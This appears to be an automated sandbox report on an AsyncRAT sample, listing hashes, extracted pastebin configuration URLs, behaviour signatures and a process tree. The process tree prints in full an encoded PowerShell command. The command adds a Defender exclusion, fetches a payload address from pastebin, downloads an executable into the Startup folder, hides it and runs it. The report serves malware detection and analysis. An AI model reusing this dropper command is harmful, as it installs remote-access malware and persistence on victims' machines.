Analysis
-
max time kernel
232s -
max time network
239s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
20/03/2023, 13:15
Static task
static1
General
-
Target
service.exe
-
Size
237KB
-
MD5
2941d6fca94a537479d4d2a12c8a0ed2
-
SHA1
6c8d05a2aefec10e7257fcbb2da8dfa822aacc1c
-
SHA256
087427c0b74d495483859b7e587ef1063529253a2490c892d09f04465ef4f2c0
-
SHA512
e04fc8b6ea6a36cd67a841dda96ddefbab77a0fb994f0eb771ff357df40355ca7fad3afa75254dcd8eae0753cc0a478180e6343ba1ca55c7edf82dbbb3851826
-
SSDEEP
3072:r4tWK9YMDbz6fV/NpbnyAGJwhOnQdT1MgvAOdj8MXoiTYfSHw69pJZXAqacHy1lg:m9j76xnImFZ1MmF8QTU/urSiLfTP8yl
Malware Config
Extracted
https://pastebin.com/raw/vNcCt60A
Extracted
asyncrat
0.5.7B
Default
Mutex
-
delay
3
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/3Z9zi18j
Signatures
-
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x0006000000023189-203.dat asyncrat behavioral1/files/0x0006000000023189-204.dat asyncrat behavioral1/memory/4640-205-0x0000000000AE0000-0x0000000000AF2000-memory.dmp asyncrat -
Blocklisted process makes network request 4 IoCs
flow pid Process 45 3392 powershell.exe 50 3392 powershell.exe 52 3392 powershell.exe 54 3392 powershell.exe -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4084 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation service.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD2.exe powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD2.exe attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 4640 tmp4DD2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\988a02bb-3051-49c1-8f67-934d9036fd2c.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230320141740.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings service.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3048 powershell.exe 3048 powershell.exe 3392 powershell.exe 3392 powershell.exe 1804 msedge.exe 1804 msedge.exe 2836 msedge.exe 2836 msedge.exe 3764 identity_helper.exe 3764 identity_helper.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeIncreaseQuotaPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe Token: SeTakeOwnershipPrivilege 3392 powershell.exe Token: SeLoadDriverPrivilege 3392 powershell.exe Token: SeSystemProfilePrivilege 3392 powershell.exe Token: SeSystemtimePrivilege 3392 powershell.exe Token: SeProfSingleProcessPrivilege 3392 powershell.exe Token: SeIncBasePriorityPrivilege 3392 powershell.exe Token: SeCreatePagefilePrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeRestorePrivilege 3392 powershell.exe Token: SeShutdownPrivilege 3392 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeSystemEnvironmentPrivilege 3392 powershell.exe Token: SeRemoteShutdownPrivilege 3392 powershell.exe Token: SeUndockPrivilege 3392 powershell.exe Token: SeManageVolumePrivilege 3392 powershell.exe Token: 33 3392 powershell.exe Token: 34 3392 powershell.exe Token: 35 3392 powershell.exe Token: 36 3392 powershell.exe Token: SeDebugPrivilege 4640 tmp4DD2.exe Token: SeDebugPrivilege 4640 tmp4DD2.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4836 wrote to memory of 2308 4836 service.exe 86 PID 4836 wrote to memory of 2308 4836 service.exe 86 PID 4836 wrote to memory of 2308 4836 service.exe 86 PID 2308 wrote to memory of 3048 2308 WScript.exe 87 PID 2308 wrote to memory of 3048 2308 WScript.exe 87 PID 2308 wrote to memory of 3048 2308 WScript.exe 87 PID 3048 wrote to memory of 3392 3048 powershell.exe 91 PID 3048 wrote to memory of 3392 3048 powershell.exe 91 PID 3048 wrote to memory of 3392 3048 powershell.exe 91 PID 3392 wrote to memory of 4084 3392 powershell.exe 103 PID 3392 wrote to memory of 4084 3392 powershell.exe 103 PID 3392 wrote to memory of 4084 3392 powershell.exe 103 PID 3392 wrote to memory of 4640 3392 powershell.exe 105 PID 3392 wrote to memory of 4640 3392 powershell.exe 105 PID 3392 wrote to memory of 4640 3392 powershell.exe 105 PID 4640 wrote to memory of 2836 4640 tmp4DD2.exe 112 PID 4640 wrote to memory of 2836 4640 tmp4DD2.exe 112 PID 2836 wrote to memory of 3808 2836 msedge.exe 113 PID 2836 wrote to memory of 3808 2836 msedge.exe 113 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 5040 2836 msedge.exe 114 PID 2836 wrote to memory of 1804 2836 msedge.exe 115 PID 2836 wrote to memory of 1804 2836 msedge.exe 115 PID 2836 wrote to memory of 2752 2836 msedge.exe 117 PID 2836 wrote to memory of 2752 2836 msedge.exe 117 PID 2836 wrote to memory of 2752 2836 msedge.exe 117 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4084 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\service.exe"C:\Users\Admin\AppData\Local\Temp\service.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Unrestricted -nologo -command .\service.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand IAAgACAAIwAtACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAC0AIwAKACAAIwAtACMAIAAgACAAcwBjAHIAaQBwAHQAIABiAHkAIABhAHYAaQByAG8AbAAgAF4AXwBeACAAIAAgACMALQAjAAoAIAAgACAAIwAtACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAC0AIwAKAAoAJABWAGEAbAB1AGUAPQBHAGUAdAAtAEMAbwBtAHAAdQB0AGUAcgBJAG4AZgBvAHwAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AZQB4AHAAYQBuAGQAIABPAHMATgBhAG0AZQAKAGkAZgAgACgAIAAkAFYAYQBsAHUAZQAgAC0AbQBhAHQAYwBoACAAJwAxADAAJwApAAoAewAKACAAZQBjAGgAbwAgACcATgBvAHQAaABpAG4AZwAgAHQAbwAgAGQAbwAhACcACgB9AAoAZQBsAHMAZQBpAGYAIAAoACQAVgBhAGwAdQBlACAALQBtAGEAdABjAGgAIAAnADEAMQAnACkACgB7AAoAIABlAGMAaABvACAAJwBOAG8AdABoAGkAbgBnACAAdABvACAAZABvACEAJwAKAH0ACgBlAGwAcwBlAAoAewAKACAAZQB4AGkAdAAKAH0ACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACcAZQB4AGUAJwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKACQAUABhAHQAaAA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AJwArACcAcABhAHMAdABlACcAKwAnAGIAaQBuACcAKwAnAC4AJwArACcAYwBvAG0AJwArACcALwAnACsAJwByAGEAdwAnACsAJwAvACcAKwAnAHYATgBjAEMAdAA2ADAAQQAnACkACgAkAFIAYQB3AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABQAGEAdABoACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKACQAUgBhAHcALgBDAG8AbgB0AGUAbgB0AAoAaQBmACAAKAAnAGUAcgByAG8AcgAnACAALQBlAHEAIAAkAFIAYQB3AC4AYwBvAG4AdABlAG4AdAApAAoAewAKACAAZQB4AGkAdAAKAH0ACgAkAE4AdQBtAGIAZQByADEAPQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAAJwA5ACcACgAkAE4AdQBtAGIAZQByADIAPQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAAJwA5ACcACgAkAFAAYQB0AGgAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAKwBTAHAAZQBjAGkAYQBsAEYAbwBsAGQAZQByAF0AOgA6AFMAdABhAHIAdAB1AHAAKQAKAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAtAFAAYQB0AGgAIAAkAFAAYQB0AGgACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABSAGEAdwAuAGMAbwBuAHQAZQBuAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAuAFwAJwBcAHQAbQBwACcAJABOAHUAbQBiAGUAcgAxACcARABEACcAJABOAHUAbQBiAGUAcgAyACcALgBlAHgAZQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKAEMAOgBcAD8AaQA/AGQAPwB3AD8AXAA/AHkAPwB0AD8AbQA/ADIAXAA/AHQAPwByAD8AYgAuAD8AeAA/ACAAKwBzACAAKwBoACAALgBcACcAXAB0AG0AcAAnACQATgB1AG0AYgBlAHIAMQAnAEQARAAnACQATgB1AG0AYgBlAHIAMgAnAC4AZQB4AGUAJwAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AQwBvAG0AbQBhAG4AZAAgAC4AXAAnAFwAdABtAHAAJwAkAE4AdQBtAGIAZQByADEAJwBEAEQAJwAkAE4AdQBtAGIAZQByADIAJwAuAGUAeABlACcA4⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\attrib.exe"C:\Windows\System32\attrib.exe" +s +h .\\tmp4DD2.exe5⤵
- Sets file to hidden
- Drops startup file
- Views/modifies file attributes
PID:4084
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD2.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD2.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/6⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9a80946f8,0x7ff9a8094708,0x7ff9a80947187⤵PID:3808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:27⤵PID:5040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:1804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:87⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:17⤵PID:4452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:17⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:17⤵PID:4260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:17⤵PID:5064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:17⤵PID:472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:87⤵PID:3728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings7⤵
- Drops file in Program Files directory
PID:4664 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff73cfa5460,0x7ff73cfa5470,0x7ff73cfa54808⤵PID:2140
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:3764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:17⤵PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:17⤵PID:1616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1784 /prefetch:17⤵PID:5424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1696 /prefetch:17⤵PID:5396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:17⤵PID:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4292 /prefetch:27⤵
- Suspicious behavior: EnumeratesProcesses
PID:4324
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1092
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5957d822ad80c424427827c78b3ca4af9
SHA11efa45c8436aa900c37b0acb6ea608951d4574b8
SHA25648290dffeb4e47abd9d68d92efaf47d9c9874c1eff8e878194e1505308196d9a
SHA5121837f846850932e36b7ca8c9b5baf07dd8b481b23c584cbe7526d2266028f65745f5fda9d7e3811e7a0077d5f78d98e440bc445cd1abbff75a36c97c1256d319
-
Filesize
152B
MD55a10efe23009825eadc90c37a38d9401
SHA1fd98f2ca011408d4b43ed4dfd5b6906fbc7b87c0
SHA25605e135dee0260b4f601a0486401b64ff8653875d74bf259c2da232550dbfb4f5
SHA51289416a3f5bf50cd4a432ac72cd0a7fb79d5aeb10bdcc468c55bbfa79b9f43fab17141305d44cb1fe980ec76cc6575c27e2bcfcbad5ccd886d45b9de03fb9d6d7
-
Filesize
152B
MD5c1a3c45dc07f766430f7feaa3000fb18
SHA1698a0485bcf0ab2a9283d4ebd31ade980b0661d1
SHA256adaba08026551b1b8f6c120143686da79f916d02adbef4a8d1c184e32a19fd48
SHA5129fc93f01ab4b14f555791d757ffe881787cc697102547c61847552e597e206e70c6d35fedff559c72a0a67d1b95e769095ecb0a8a7d4f07cf58a7a0d57d3e9f4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize288B
MD522bda16fec93154b7875a02390dc38b7
SHA10b6a584bd9347f865f3afaeef31e5e93f6b71f95
SHA2567554347737fbaf6247a02733ddd5f6daf1ed5ccb290495d8e1be7741d7157a4b
SHA512bfc0e9e89ce19f41033c0b5aff5d82a6137a1845805eb1a9560ca07cc2f4bce48cad7e5f6c9feeea985c03c6e36d5c2f53cc6a7c3b3ca173b4d9c9cba04723f8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe58535b.TMP
Filesize48B
MD507e6613137a19fec872544f5dc690cb9
SHA1bd9e31d574941511af2831533bc7244269b5bcc0
SHA25656d136e1f1e4f783d4de0c9944cee6d1d94625c1d8953fed920ced8716e00bd9
SHA512f4b9738e23ee2a7a33c0a2dd6f19d1d2b54dde7b3d85ea5762ad369be54f4ab3ec9d4ce33effbc8de06dfcd322b206641f75bf248497dda9762681d6c0ce5b88
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
2KB
MD52fe2c400942edf202bbd10a687bc0aa2
SHA1bee8ac90aaad3e525a711fcf1b5dd5fd64f864e8
SHA256ef6ace55d165ea1799e99f9a4e1ca8d32fd073334bbacb98607a7cf0af36e93c
SHA51278739baf9fb06786f3d0b52914e09046c1e6cb430d79e3a8381392bcae6e064209095e0908130937c98abb74183d9845afc7935f14bff405c7cbe802396fa677
-
Filesize
1KB
MD5337b8a83f1e01abc60986d7fe8ef7a35
SHA1ed68860b938323d4b313ff4c4bb336d605787c5d
SHA25667dad85baa707a6171ab0f4f4c136e689da7adcc4130bd194745fd897afbbc52
SHA5120bd91ee478bf71c07a11db59e455e677108622bb53ea458fa73c27d0d4b97fffecdb4a132f59935881471a13f6de6d44404d6504449bbd67378889b443484546
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
